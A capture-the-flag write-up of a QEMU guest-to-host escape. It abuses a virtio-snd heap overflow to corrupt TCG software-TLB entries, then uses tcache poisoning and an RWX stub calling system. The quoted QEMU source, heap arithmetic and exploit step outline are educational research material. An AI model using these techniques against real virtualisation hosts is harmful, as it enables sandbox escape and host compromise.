Another fun thing about this challenge is that the kernel is minimally compiled and doesn’t expose any functionality required to actually talk to the driver. You have to create this yourself (if you even need it! More on this later).

For this challenge, I’ll go over two ways to exploit this: the originally intended path and another (less intended) path created by an unnamed entity during the game that just happened to fall into my hands.

Intended Exploit

First of all, credit for the exploitation idea goes to the DiceCTF bassoon writeup:

Note (Bassoon writeup)

first part is getting consistent heap corruption primitives using the fact that all 7 0x100 tcache entries are almost always contiguous. from here you can get overlapping chunks and prepare a UAF write. next part is figuring out what structure to actually target. we don’t have partial overwrite which forces us to target something that gets allocated after our corruption, and prevents us from dealing with things containing absolute addresses. most important things are allocated in the main heap, and the thread heap is mostly used by TCG.

there may be multiple approaches, but my solution is to overwrite entries in the TCG fast path CPUTLBEntry table, which basically implements the TLB for guest virtual to host virtual address translation. it gets reallocd on the thread heap in tlb_mmu_resize_locked which gets triggered either periodically from tlb_flush_by_mmuidx_async_work which we can’t control very well, or on a single page flush if the page is a large (huge) page. we can thus flush a huge page with invlpg to trigger resizing. the new size is based on a rate calculated within a 100 ms window, so we want to busy loop at cpl0 after the first flush to get a low rate and downsize the table.

there are tables for each mmu_idx type, which is an arch-based classifier. for x64, there are 3 main ones: usermode, kernel mode, and kernel mode running usermode code through SMAP. you could simplify the exploitation by doing it all through one mmu_idx so you don’t need to context switch to trigger TLB activity between invlpg’ing, but i just did it with the usermode TLB anyway and had a kernel module that let me call my own userspace functions at cpl0. the noise taming part is very difficult, since TCG is constantly allocating chunks of 0x28 to insert nodes into qtree during TCG translation within tb_gen_code (called for each basic block). we get around this by stuffing all of our important operations for triggering heap activity like the intel HDA writes and invlpgs into single basic blocks at a time.

we get overlapping chunks and free a size 0x810 for the fast TLB to reclaim when it downsizes to minimum size of 0x40 (0x20 size per entry). each entry in the table has 3 virtual addresses and one addend. the virtual addresses correspond to the guest virtual addresses translations for read, write, and code accesses, and the addend gets added to the virtual address to calculate the host address. we can’t control the addend usefully without leaks, but we can overwrite the virtual address, and the difference between our overwritten one and the old one effectively gets added to the addend during translation. this is how we are able to get reliable memory corruption leaklessly, and i think it’s a pretty cool and novel technique.

the host address a virtual address maps to is dependent on the physical address, so we can get a reliable location in the mapping space by having our vaddr tied to a fixed physical address like 0. the thread heap arena is consistently 0x7e00000 bytes behind the host mapping for physical address 0. 0x7e0 & 0x3f is also 0 so this will be placed at index 0 in the table making it easy to overflow into. so we first map 0x7e00000 to 0, and now overflow the virtual addresses to 0, and when we deref 0 it will hit the TLB and translate as (intended host address - 0x7e00000) + 0 which we have established is just the thread heap arena.

so now we have arb read/write into the first page of the arena which contains things like tcache bins and various pointers to other regions. i leaked the rwx region and main heap, then overwrote two tcache entries to first write shellcode to the rwx region and then overwrite a function pointer in the main heap with a pointer to the shellcode.

all of the past qemu exploits i’ve seen for real vulns usually try to get some explicit leak primitive either from a separate vuln or some random device, but i think it’s cool that it’s theoretically possible in a stable enough environment to do this sort of leakless technique. it does rely on TCG though, maybe i’ll try this challenge again but with KVM and see if it’s still possible.
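The numbers in the quoted writeup can be checked with a few lines of arithmetic. This is a sketch under stated assumptions: 4 KiB guest pages, 32-byte entries, the index taken as the page number masked by the table size (which is how I understand QEMU's tlb_index()), and the usual 64-bit glibc chunk rounding. The function names are mine.

```javascript
const TARGET_PAGE_BITS = 12n;   // 4 KiB guest pages on x86
const CPU_TLB_ENTRY_BITS = 5n;  // 32-byte entries on a 64-bit host
const MIN_TLB_ENTRIES = 0x40n;  // minimum table size from the quote

// Slot of a guest virtual address in a table with nEntries entries.
function tlbIndex(vaddr, nEntries) {
  return (vaddr >> TARGET_PAGE_BITS) & (nEntries - 1n);
}

// Bytes requested from the allocator for the fast table.
function tlbTableBytes(nEntries) {
  return nEntries << CPU_TLB_ENTRY_BITS;
}

// glibc chunk size on 64-bit: request + 8-byte header, rounded up to 16, minimum 32.
function glibcChunkSize(request) {
  const rounded = (request + 8n + 15n) & ~15n;
  return rounded < 32n ? 32n : rounded;
}

console.log(tlbIndex(0x7e00000n, MIN_TLB_ENTRIES));                      // 0n
console.log(tlbIndex(0n, MIN_TLB_ENTRIES));                              // 0n
console.log(tlbTableBytes(MIN_TLB_ENTRIES).toString(16));                // 800
console.log(glibcChunkSize(tlbTableBytes(MIN_TLB_ENTRIES)).toString(16)); // 810
```

So the page number of 0x7e00000 is 0x7e00, which lands in slot 0 of a 64-entry table, and a minimum-size table is a 0x800-byte request that fits the freed 0x810 chunk.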

The compiled kernel doesn’t expose much, if anything, to interact with the device, so my solver patches in a couple of utilities using the physical r/w:

virtual to physical
remapping a userspace virtual page to an arbitrary guest physical 4k page
install a 2MiB page-table mapping
invlpg
(setuid)
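As a rough illustration of what the first three utilities have to compute, here is a minimal sketch assuming standard x86-64 4-level paging. The names split_vaddr and make_2m_pde are hypothetical and are not taken from the solver; the bit positions (present, writable, user, page-size) are the architectural ones.

```c
#include <assert.h>
#include <stdint.h>

/* x86-64 4-level paging: each level consumes 9 bits of the virtual address. */
struct pt_indices {
    unsigned pml4, pdpt, pd, pt;
};

/* Hypothetical helper: split a virtual address into its table indices. */
static inline struct pt_indices split_vaddr(uint64_t vaddr)
{
    struct pt_indices idx = {
        .pml4 = (unsigned)((vaddr >> 39) & 0x1ff),
        .pdpt = (unsigned)((vaddr >> 30) & 0x1ff),
        .pd   = (unsigned)((vaddr >> 21) & 0x1ff),
        .pt   = (unsigned)((vaddr >> 12) & 0x1ff),
    };
    return idx;
}

#define PTE_PRESENT (1ULL << 0)
#define PTE_RW      (1ULL << 1)
#define PTE_USER    (1ULL << 2)
#define PTE_PS      (1ULL << 7) /* in a PD entry: maps a 2 MiB page */

/* Hypothetical helper: build a user-accessible, writable 2 MiB PD entry. */
static inline uint64_t make_2m_pde(uint64_t phys)
{
    /* A 2 MiB mapping needs a 2 MiB-aligned physical base. */
    assert((phys & ((1ULL << 21) - 1)) == 0);
    return phys | PTE_PRESENT | PTE_RW | PTE_USER | PTE_PS;
}
```

With the physical r/w primitive, installing the large mapping then amounts to writing the value from make_2m_pde() into the PD slot selected by split_vaddr(), followed by an invalidation.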

TLB / Target

A quick background recap on the TLB: a normal CPU has a Translation Lookaside Buffer (TLB), a cache for page table translations. Instead of walking page tables on every memory access, the CPU remembers that a virtual page recently translated to a particular physical page with particular permissions. Roughly:

virtual address
      |
      v
TLB lookup: virtual page -> physical page + permissions
      |
      v
memory access

When an operating system changes page tables, old cached translations may no longer be correct. A TLB flush invalidates those cached translations. On x86, invlpg addr invalidates the cached translation for one virtual page, while operations such as CR3 reloads can invalidate many entries.

In this exploit, however, the interesting TLB is not the host CPU’s hardware TLB. The interesting object is QEMU TCG’s software TLB. TCG-generated host code also wants memory accesses to be fast, so QEMU keeps its own cache of guest virtual address translations. That cache lives in normal QEMU heap memory. For a guest RAM access in system emulation, the path is roughly:

guest virtual address
      |
      v
QEMU TCG software TLB lookup
      |
      +-- hit  -> host pointer = guest address + entry.addend
      |
      +-- miss -> slow path walks guest page tables, fills TLB entry

The fast entry type is CPUTLBEntry:


#define CPU_TLB_ENTRY_BITS (HOST_LONG_BITS == 32 ? 4 : 5)

/* Minimalized TLB entry for use by TCG fast path. */
typedef union CPUTLBEntry {
    struct {
        uintptr_t addr_read;
        uintptr_t addr_write;
        uintptr_t addr_code;
        /*
         * Addend to virtual address to get host address.  IO accesses
         * use the corresponding iotlb value.
         */
        uintptr_t addend;
    };
    /*
     * Padding to get a power of two size, as well as index
     * access to addr_{read,write,code}.
     */
    uintptr_t addr_idx[(1 << CPU_TLB_ENTRY_BITS) / sizeof(uintptr_t)];
} CPUTLBEntry;

QEMU_BUILD_BUG_ON(sizeof(CPUTLBEntry) != (1 << CPU_TLB_ENTRY_BITS));

The three addr_* fields are compare values for read, write, and instruction fetch accesses. The addend is the part that turns a guest virtual address into a host pointer:

/* Everything else is RAM. */
*phost = (void *)((uintptr_t)addr + entry->addend);
return flags;

So this is a good primitive to target, since it directly decides which host address QEMU reads or writes. The lookup table is indexed by the guest virtual page:

static inline uintptr_t tlb_index(CPUState *cpu, uintptr_t mmu_idx,
                                  vaddr addr)
{
    uintptr_t size_mask = cpu_tlb_fast(cpu, mmu_idx)->mask >> CPU_TLB_ENTRY_BITS;

    return (addr >> TARGET_PAGE_BITS) & size_mask;
}

For the minimum table size used later, there are 64 entries, so the mask is 0x3f. Guest address 0 and guest address 0x8000000 both land in index 0:

(0x0       >> 12) & 0x3f = 0
(0x8000000 >> 12) & 0x3f = 0

That lets the exploit first create a legitimate entry for 0x8000000, then corrupt only the compare fields so the same entry also appears valid for guest address 0.
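To check candidate addresses for index collisions, the index calculation can be modeled standalone. This is a minimal sketch assuming 4 KiB guest pages; tlb_index_model is a hypothetical name that mirrors tlb_index() without the QEMU state.

```c
#include <assert.h>
#include <stdint.h>

#define TARGET_PAGE_BITS_MODEL 12 /* assumption: 4 KiB guest pages (x86) */

/*
 * Model of tlb_index(): page number masked by (n_entries - 1).
 * n_entries must be a power of two, as QEMU's dynamic TLB sizes are.
 */
static inline uint64_t tlb_index_model(uint64_t vaddr, uint64_t n_entries)
{
    assert(n_entries != 0 && (n_entries & (n_entries - 1)) == 0);
    return (vaddr >> TARGET_PAGE_BITS_MODEL) & (n_entries - 1);
}
```

For a 64-entry table, any two guest addresses whose page numbers agree in the low 6 bits share an entry, which is why 0 and 0x8000000 collide while 0x8001000 lands in index 1.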

Before corruption, entry 0 looks like:

CPUTLBEntry[0]
+-----------------------------------+
| addr_read  = 0x8000000 | flags    |
| addr_write = 0x8000000 | flags    |
| addr_code  = ...                  |
| addend     = host_ptr - 0x8000000 |
+-----------------------------------+

After the virtio-snd overflow writes into the first 0x10 bytes:

CPUTLBEntry[0]
+-----------------------------------+
| addr_read  = 0                    |
| addr_write = 0                    |
| addr_code  = ...                  |
| addend     = host_ptr - 0x8000000 |
+-----------------------------------+

Now a guest load from virtual address 0 can pass the fast-path compare, but the preserved addend still points at the host location derived from the old 0x8000000 translation:

host = 0 + (host_ptr - 0x8000000)

For us that lands inside QEMU’s host heap.
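The effect of the corruption can be sketched with a small model of the fast path. This is a simplification under stated assumptions: the struct and function names are hypothetical, and the compare ignores the flag bits that real QEMU keeps in the low bits of the addr_* fields.

```c
#include <assert.h>
#include <stdbool.h>
#include <stdint.h>

#define PAGE_MASK_MODEL (~(uint64_t)0xfff) /* assumption: 4 KiB pages */

/* Same four-qword layout as the struct part of CPUTLBEntry on a 64-bit host. */
struct tlb_entry_model {
    uint64_t addr_read;
    uint64_t addr_write;
    uint64_t addr_code;
    uint64_t addend;
};
static_assert(sizeof(struct tlb_entry_model) == 0x20, "entry must be 0x20 bytes");

/* Simplified fast-path compare for loads: page of vaddr vs. addr_read. */
static inline bool read_hits(const struct tlb_entry_model *e, uint64_t vaddr)
{
    return (e->addr_read & PAGE_MASK_MODEL) == (vaddr & PAGE_MASK_MODEL);
}

/* Host address on a hit; unsigned wraparound is intentional. */
static inline uint64_t host_for(const struct tlb_entry_model *e, uint64_t vaddr)
{
    return vaddr + e->addend;
}

/* What the 0x10-byte overflow does: zero the first two qwords only. */
static inline void corrupt_compare_fields(struct tlb_entry_model *e)
{
    e->addr_read = 0;
    e->addr_write = 0;
}
```

After corrupt_compare_fields(), a load from guest address 0x10 hits and resolves 0x8000000 bytes below where the original mapping pointed, while the original guest address no longer hits this entry.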

Primitives

A QEMU TLB flush invalidates entries in this software cache. For a full flush of one MMU index, QEMU clears the entry table and resets accounting:


static void tlb_mmu_flush_locked(CPUTLBDesc *desc, CPUTLBDescFast *fast)
{
    desc->n_used_entries = 0;
    desc->large_page_addr = -1;
    desc->large_page_mask = -1;
    desc->vindex = 0;
    memset(fast->table, -1, sizeof_tlb(fast));
    memset(desc->vtable, -1, sizeof(desc->vtable));
}

For a single-page flush, QEMU normally invalidates one table entry. But QEMU also tracks large-page translations. If the flushed page belongs to a tracked large page, tlb_flush_page_locked() escalates to a full flush for that MMU index:


static void tlb_flush_page_locked(CPUState *cpu, int midx, vaddr page)
{
    vaddr lp_addr = cpu->neg.tlb.d[midx].large_page_addr;
    vaddr lp_mask = cpu->neg.tlb.d[midx].large_page_mask;

    /* Check if we need to flush due to large pages.  */
    if ((page & lp_mask) == lp_addr) {
        tlb_flush_one_mmuidx_locked(cpu, midx, get_clock_realtime());
    } else {
        if (tlb_flush_entry_locked(tlb_entry(cpu, midx, page), page)) {
            tlb_n_used_entries_dec(cpu, midx);
        }
        tlb_flush_vtlb_page_locked(cpu, midx, page);
    }
}

To trigger these flushes from the guest, we can, for example, flip a mapped guest region to PROT_NONE and back to PROT_READ | PROT_WRITE. Inside the guest, that makes the kernel update page tables and flush stale guest translations. In TCG, those guest invalidations cause QEMU to throw away the affected software TLB entries.
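A minimal sketch of that protection flip from guest userspace, assuming a Linux guest and a page-aligned mapping. The helper names map_scratch_page and flip_protection are hypothetical; only mmap() and mprotect() are real APIs here.

```c
#define _DEFAULT_SOURCE /* for MAP_ANONYMOUS under strict -std= modes */
#include <assert.h>
#include <stddef.h>
#include <sys/mman.h>

/* Hypothetical helper: map one anonymous read/write page to play with. */
static inline void *map_scratch_page(void)
{
    void *p = mmap(NULL, 4096, PROT_READ | PROT_WRITE,
                   MAP_PRIVATE | MAP_ANONYMOUS, -1, 0);
    assert(p != MAP_FAILED);
    return p;
}

/*
 * Drop and restore access on a mapped region. The guest kernel has to
 * rewrite the PTEs and invalidate stale translations both times.
 * Returns 0 on success, -1 if either mprotect() call fails.
 */
static inline int flip_protection(void *page, size_t len)
{
    if (mprotect(page, len, PROT_NONE) != 0) {
        return -1;
    }
    return mprotect(page, len, PROT_READ | PROT_WRITE);
}
```

The page contents survive the flip, so the same region can be touched again afterwards to repopulate the software TLB entry.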

Then we install HUGE_VADDR as a 2 MiB mapping and invalidate it with our inserted invlpg primitive. The i386 TCG helper for invlpg reaches:

void helper_flush_page(CPUX86State *env, target_ulong addr)
{
    tlb_flush_page(env_cpu(env), addr);
}

Because HUGE_VADDR is a large mapping, QEMU’s large-page tracking can turn that single-page invalidation into the full-MMU-index flush path. That matters because the resize logic is tied to full-table flushing.

The TCG TLB tables are dynamic. QEMU tracks how many entries were used in a short time window. When a flush happens, tlb_mmu_resize_locked() may grow or shrink the table based on that recent usage rate.

The important part for exploitation is that a resize is a normal heap free and allocation:


static void tlb_mmu_resize_locked(CPUTLBDesc *desc, CPUTLBDescFast *fast,
                                  int64_t now)
{
    size_t old_size = tlb_n_entries(fast);
    size_t rate;
    size_t new_size = old_size;
    int64_t window_len_ms = 100;
    int64_t window_len_ns = window_len_ms * 1000 * 1000;
    bool window_expired = now > desc->window_begin_ns + window_len_ns;

    if (desc->n_used_entries > desc->window_max_entries) {
        desc->window_max_entries = desc->n_used_entries;
    }
    rate = desc->window_max_entries * 100 / old_size;

    if (rate > 70) {
        new_size = MIN(old_size << 1, 1 << CPU_TLB_DYN_MAX_BITS);
    } else if (rate < 30 && window_expired) {
        size_t ceil = pow2ceil(desc->window_max_entries);
        size_t expected_rate = desc->window_max_entries * 100 / ceil;

        /*
         * Avoid undersizing when the max number of entries seen is just below
         * a pow2. For instance, if max_entries == 1025, the expected use rate
         * would be 1025/2048==50%. However, if max_entries == 1023, we'd get
         * 1023/1024==99.9% use rate, so we'd likely end up doubling the size
         * later. Thus, make sure that the expected use rate remains below 70%.
         * (and since we double the size, that means the lowest rate we'd
         * expect to get is 35%, which is still in the 30-70% range where
         * we consider that the size is appropriate.)
         */
        if (expected_rate > 70) {
            ceil *= 2;
        }
        new_size = MAX(ceil, 1 << CPU_TLB_DYN_MIN_BITS);
    }

    if (new_size == old_size) {
        if (window_expired) {
            tlb_window_reset(desc, now, desc->n_used_entries);
        }
        return;
    }

    g_free(fast->table);
    g_free(desc->fulltlb);

    tlb_window_reset(desc, now, 0);
    /* desc->n_used_entries is cleared by the caller */
    fast->mask = (new_size - 1) << CPU_TLB_ENTRY_BITS;
    fast->table = g_try_new(CPUTLBEntry, new_size);
    desc->fulltlb = g_try_new(CPUTLBEntryFull, new_size);

    /*
     * If the allocations fail, try smaller sizes. We just freed some
     * memory, so going back to half of new_size has a good chance of working.
     * Increased memory pressure elsewhere in the system might cause the
     * allocations to fail though, so we progressively reduce the allocation
     * size, aborting if we cannot even allocate the smallest TLB we support.
     */
    while (fast->table == NULL || desc->fulltlb == NULL) {
        if (new_size == (1 << CPU_TLB_DYN_MIN_BITS)) {
            error_report("%s: %s", __func__, strerror(errno));
            abort();
        }
        new_size = MAX(new_size >> 1, 1 << CPU_TLB_DYN_MIN_BITS);
        fast->mask = (new_size - 1) << CPU_TLB_ENTRY_BITS;

        g_free(fast->table);
        g_free(desc->fulltlb);
        fast->table = g_try_new(CPUTLBEntry, new_size);
        desc->fulltlb = g_try_new(CPUTLBEntryFull, new_size);
    }
}

So by touching many guest pages, we can make the table grow. This raises desc->n_used_entries and therefore window_max_entries; once the used-entry rate crosses 70%, QEMU doubles the table. Later, after the target 0x810 RX hole has been freed, we do the opposite: touch only one or a few pages, trigger a flush, wait for the 100 ms resize window to expire, and trigger another flush. At that point window_max_entries is tiny relative to the old table, so rate < 30 and QEMU shrinks to MAX(pow2ceil(window_max_entries), 1 << CPU_TLB_DYN_MIN_BITS). With one useful entry, that is the minimum fast table: 64 entries.

64 * sizeof(CPUTLBEntry)
64 * 0x20 = 0x800-byte allocation
glibc chunk size = 0x810
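The grow/shrink decision can be replayed offline to plan how many pages to touch. This is a minimal sketch of the policy in tlb_mmu_resize_locked(), not QEMU code: next_tlb_size and pow2ceil_model are hypothetical names, window_max_entries is passed in already updated, and dyn_max_bits stands in for CPU_TLB_DYN_MAX_BITS, whose value depends on the build.

```c
#include <assert.h>
#include <stdbool.h>
#include <stddef.h>

#define DYN_MIN_BITS_MODEL 6 /* 64 entries, the minimum table size above */

/* Smallest power of two >= v (returns 1 for v == 0 or v == 1). */
static inline size_t pow2ceil_model(size_t v)
{
    size_t p = 1;
    while (p < v) {
        p <<= 1;
    }
    return p;
}

/* Table size (in entries) that a full flush would pick next. */
static inline size_t next_tlb_size(size_t old_size, size_t window_max_entries,
                                   bool window_expired, unsigned dyn_max_bits)
{
    size_t min_size = (size_t)1 << DYN_MIN_BITS_MODEL;
    size_t max_size = (size_t)1 << dyn_max_bits;
    size_t new_size = old_size;
    size_t rate;

    assert(old_size >= min_size);
    rate = window_max_entries * 100 / old_size;

    if (rate > 70) {
        /* Heavily used: double, capped at the maximum. */
        new_size = old_size << 1;
        if (new_size > max_size) {
            new_size = max_size;
        }
    } else if (rate < 30 && window_expired) {
        /* Lightly used and the 100 ms window is over: shrink. */
        size_t target = pow2ceil_model(window_max_entries);
        if (window_max_entries * 100 / target > 70) {
            target *= 2;
        }
        new_size = target > min_size ? target : min_size;
    }
    return new_size;
}

/* Bytes requested for the fast table: 0x20 per CPUTLBEntry. */
static inline size_t fast_table_bytes(size_t n_entries)
{
    return n_entries * 0x20;
}
```

In this model a 1024-entry table with one recently used entry only shrinks once the window has expired, which matches the flush, wait, flush sequence described above.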

First of all, a note on our virtio-snd primitives. The buffer type is:

/*
 * VirtIOSoundPCMBuffer has a dynamic size since it includes the raw PCM data
 * in its allocation. It must be initialized and destroyed as follows:
 *
 *   size_t size = [[derived from owned VQ element descriptor sizes]];
 *   buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);
 *   buffer->elem = [[owned VQ element]];
 *
 *   [..]
 *
 *   g_free(buffer->elem);
 *   g_free(buffer);
 */
struct VirtIOSoundPCMBuffer {
    QSIMPLEQ_ENTRY(VirtIOSoundPCMBuffer) entry;
    VirtQueueElement *elem;
    VirtQueue *vq;
    size_t size;
    /*
     * In TX / Playback, `offset` represents the first unused position inside
     * `data`. If `offset == size` then there are no unused data left.
     */
    uint64_t offset;
    /* Used for the TX queue for lazy I/O copy from `elem` */
    bool populated;
    /*
     * VirtIOSoundPCMBuffer is an unsized type because it ends with an array of
     * bytes. The size of `data` is determined from the I/O message's read-only
     * or write-only size when allocating VirtIOSoundPCMBuffer.
     */
    uint8_t data[];
};

On the target build, data[] starts at offset 0x29, and sizeof(VirtIOSoundPCMBuffer) rounds to 0x30.

We have two ways to allocate within the driver:

/*
 * The rx virtqueue handler. Makes the buffers available to their respective
 * streams for consumption.
 *
 * @vdev: VirtIOSound device
 * @vq: rx virtqueue
 */
static void virtio_snd_handle_rx_xfer(VirtIODevice *vdev, VirtQueue *vq)
{
    VirtIOSound *vsnd = VIRTIO_SND(vdev);
    VirtIOSoundPCMBuffer *buffer;
    VirtQueueElement *elem;
    size_t msg_sz, size;
    virtio_snd_pcm_xfer hdr;
    uint32_t stream_id;
    /*
     * if any of the I/O messages are invalid, put them in vsnd->invalid and
     * return them after the for loop.
     */
    bool must_empty_invalid_queue = false;

    if (!virtio_queue_ready(vq)) {
        return;
    }
    trace_virtio_snd_handle_rx_xfer();

    for (;;) {
        VirtIOSoundPCMStream *stream;

        elem = virtqueue_pop(vq, sizeof(VirtQueueElement));
        if (!elem) {
            break;
        }
        /* get the message hdr object */
        msg_sz = iov_to_buf(elem->out_sg,
                            elem->out_num,
                            0,
                            &hdr,
                            sizeof(virtio_snd_pcm_xfer));
        if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {
            goto rx_err;
        }
        stream_id = le32_to_cpu(hdr.stream_id);

        if (stream_id >= vsnd->snd_conf.streams
            || !vsnd->pcm.streams[stream_id]) {
            goto rx_err;
        }

        stream = vsnd->pcm.streams[stream_id];
        if (stream == NULL || stream->info.direction != VIRTIO_SND_D_INPUT) {
            goto rx_err;
        }
        WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {
            size = iov_size(elem->in_sg, elem->in_num) -
                sizeof(virtio_snd_pcm_status);
            buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);
            buffer->elem = elem;
            buffer->vq = vq;
            buffer->size = 0;
            buffer->offset = 0;
            QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);
        }
        continue;

rx_err:
        must_empty_invalid_queue = true;
        buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer));
        buffer->elem = elem;
        buffer->vq = vq;
        QSIMPLEQ_INSERT_TAIL(&vsnd->invalid, buffer, entry);
    }

    if (must_empty_invalid_queue) {
        empty_invalid_queue(vdev, vq);
    }
}

The RX path allocates 0x30 + (in_len - 0x8) = in_len + 0x28 bytes. The second way is the TX path:

/*
 * The tx virtqueue handler. Makes the buffers available to their respective
 * streams for consumption.
 *
 * @vdev: VirtIOSound device
 * @vq: tx virtqueue
 */
static void virtio_snd_handle_tx_xfer(VirtIODevice *vdev, VirtQueue *vq)
{
    VirtIOSound *vsnd = VIRTIO_SND(vdev);
    VirtIOSoundPCMBuffer *buffer;
    VirtQueueElement *elem;
    size_t msg_sz, size;
    virtio_snd_pcm_xfer hdr;
    uint32_t stream_id;
    /*
     * If any of the I/O messages are invalid, put them in vsnd->invalid and
     * return them after the for loop.
     */
    bool must_empty_invalid_queue = false;

    if (!virtio_queue_ready(vq)) {
        return;
    }
    trace_virtio_snd_handle_tx_xfer();

    for (;;) {
        VirtIOSoundPCMStream *stream;

        elem = virtqueue_pop(vq, sizeof(VirtQueueElement));
        if (!elem) {
            break;
        }
        /* get the message hdr object */
        msg_sz = iov_to_buf(elem->out_sg,
                            elem->out_num,
                            0,
                            &hdr,
                            sizeof(virtio_snd_pcm_xfer));
        if (msg_sz != sizeof(virtio_snd_pcm_xfer)) {
            goto tx_err;
        }
        stream_id = le32_to_cpu(hdr.stream_id);

        if (stream_id >= vsnd->snd_conf.streams
            || vsnd->pcm.streams[stream_id] == NULL) {
            goto tx_err;
        }

        stream = vsnd->pcm.streams[stream_id];
        if (stream->info.direction != VIRTIO_SND_D_OUTPUT) {
            goto tx_err;
        }

        WITH_QEMU_LOCK_GUARD(&stream->queue_mutex) {
            size = iov_size(elem->out_sg, elem->out_num) - msg_sz;

            buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer) + size);
            buffer->elem = elem;
            buffer->populated = false;
            buffer->vq = vq;
            buffer->size = size;
            buffer->offset = 0;
            stream->latency_bytes += size;

            QSIMPLEQ_INSERT_TAIL(&stream->queue, buffer, entry);
        }
        continue;

tx_err:
        must_empty_invalid_queue = true;
        buffer = g_malloc0(sizeof(VirtIOSoundPCMBuffer));
        buffer->elem = elem;
        buffer->vq = vq;
        QSIMPLEQ_INSERT_TAIL(&vsnd->invalid, buffer, entry);
    }

    if (must_empty_invalid_queue) {
        empty_invalid_queue(vdev, vq);
    }
}

The TX path allocates 0x30 + data_len bytes.

The important size is 0x410, since it makes the RX overflow land exactly on the fields we want in the next allocation. The vulnerable source is an RX buffer with in_len = 0x3d8:

RX data size = in_len - sizeof(virtio_snd_pcm_status)
             = 0x3d8 - 0x8
             = 0x3d0

QEMU request = sizeof(VirtIOSoundPCMBuffer) + 0x3d0
             = 0x30 + 0x3d0
             = 0x400

glibc chunk  = request2size(0x400)
             = 0x410

The source stream’s period_bytes is 0x3f7, while buffer->data starts at offset 0x29. So the buggy audio write reaches:

0x29 + 0x3f7 = 0x420 bytes from the source user pointer

The next chunk’s user pointer starts at 0x410, so the overflow reaches:

0x420 - 0x410 = 0x10 bytes into the next allocation
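The size arithmetic above can be double-checked with a few helpers. This is a minimal sketch assuming 64-bit glibc chunk rounding and the struct offsets quoted for the target build; all function and macro names are hypothetical.

```c
#include <assert.h>
#include <stddef.h>

#define PCM_BUFFER_HDR  0x30 /* sizeof(VirtIOSoundPCMBuffer) on the target build */
#define PCM_DATA_OFFSET 0x29 /* offset of data[] on the target build */
#define PCM_STATUS_SIZE 0x8  /* sizeof(virtio_snd_pcm_status) */

/* glibc request2size() for 64-bit: add 8 bytes of header, align to 16. */
static inline size_t chunk_size(size_t request)
{
    size_t sz = (request + 8 + 15) & ~(size_t)15;
    return sz < 0x20 ? 0x20 : sz;
}

/* Bytes requested by the RX handler for a given writable descriptor length. */
static inline size_t rx_request(size_t in_len)
{
    assert(in_len >= PCM_STATUS_SIZE);
    return PCM_BUFFER_HDR + (in_len - PCM_STATUS_SIZE);
}

/* Bytes requested by the TX handler for a given payload length. */
static inline size_t tx_request(size_t data_len)
{
    return PCM_BUFFER_HDR + data_len;
}

/*
 * Bytes of the next allocation's user data that get overwritten when
 * period_bytes are written starting at data[]. The distance between two
 * adjacent user pointers equals the chunk size.
 */
static inline size_t overflow_into_next(size_t request, size_t period_bytes)
{
    size_t end = PCM_DATA_OFFSET + period_bytes;
    size_t next_user = chunk_size(request);
    return end > next_user ? end - next_user : 0;
}
```

The same helpers confirm the filler sizes used in the exploit: a TX payload of 0x7d0 ends up in a 0x810 chunk, and one of 0x3d0 in a 0x410 chunk.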

That is exactly two qwords: CPUTLBEntry.addr_read and CPUTLBEntry.addr_write. 0x410 is also the last default small tcache size:

idx = (0x410 - 0x20) / 0x10 = 0x3f

So we can reuse the same 0x410 size for the arbitrary write as well.
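The bin index can be computed for any chunk size with a small helper. This is a sketch assuming 64-bit glibc with the default 64 small tcache bins; tcache_index and fits_tcache are hypothetical names, and builds with different tunables or tcache layouts may differ.

```c
#include <assert.h>
#include <stddef.h>

#define TCACHE_BINS_MODEL 64 /* assumption: default number of small tcache bins */

/* Bin index for a chunk size (header included), 16-byte granularity. */
static inline size_t tcache_index(size_t chunk_size)
{
    assert(chunk_size >= 0x20 && (chunk_size & 0xf) == 0);
    return (chunk_size - 0x20) / 0x10;
}

/* Nonzero if a chunk of this size is served from the small tcache bins. */
static inline int fits_tcache(size_t chunk_size)
{
    return tcache_index(chunk_size) < TCACHE_BINS_MODEL;
}
```

Under these assumptions 0x410 maps to the last bin, while 0x420 and the 0x810 TLB-sized chunks fall outside the small bins.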

Exploit

Combining this (and a bit of heap grooming), we can achieve something like:

Spray some 0x810 chunks with live virtio-snd TX filler buffers (fill810, TX_HOLE_FILLER_DATA_LEN = 0x7d0).
Spray some 0x410 chunks with live virtio-snd TX guard buffers (guard410, TX_SMALL_FILLER_DATA_LEN = 0x3d0).
Grow the user-mode TLB table. The idea is to shrink the TLB table later so it occupies a 0x810 chunk.
Queue RX source/target pairs. [source RX buffer: 0x410 live] [target RX buffer: 0x810]
Free only the target-side 0x810 chunk(s). This is possible because the different streams let us free only this target. [source RX buffer: 0x410 live] [target 0x810 chunk: free]
Shrink the TCG TLB so CPUTLBEntry[64] reclaims a freed 0x810 target hole. [source RX buffer: 0x410 live] [0x810 chunk: TLB table]
Overflow from the live 0x410 source into CPUTLBEntry[0].
Use guest NULL as a host heap page window. We can probe this a bit by capturing segfaults from the guest to see if it succeeded. Also, this first page immediately gives us a text and TCG code-cache rwx leak.
Edit tcache metadata in that page. For arbitrary write, we need a bit more, so we find the tcache_perthread_struct, which is in this page, write a pointer into tcache->entries[0x3f], and use the 0x410 allocation.
Use TX allocations as targeted host writes.
Write an RWX system stub and overwrite helper_info_fninit.func.
Guest executes FNINIT1 -> helper_info_fninit.func -> rwx region -> system.

We can actually stabilize all of this a bit by using, e.g., multiple targets, so there are multiple holes where the TLB table might get allocated.

Escape V2

Coming soon.
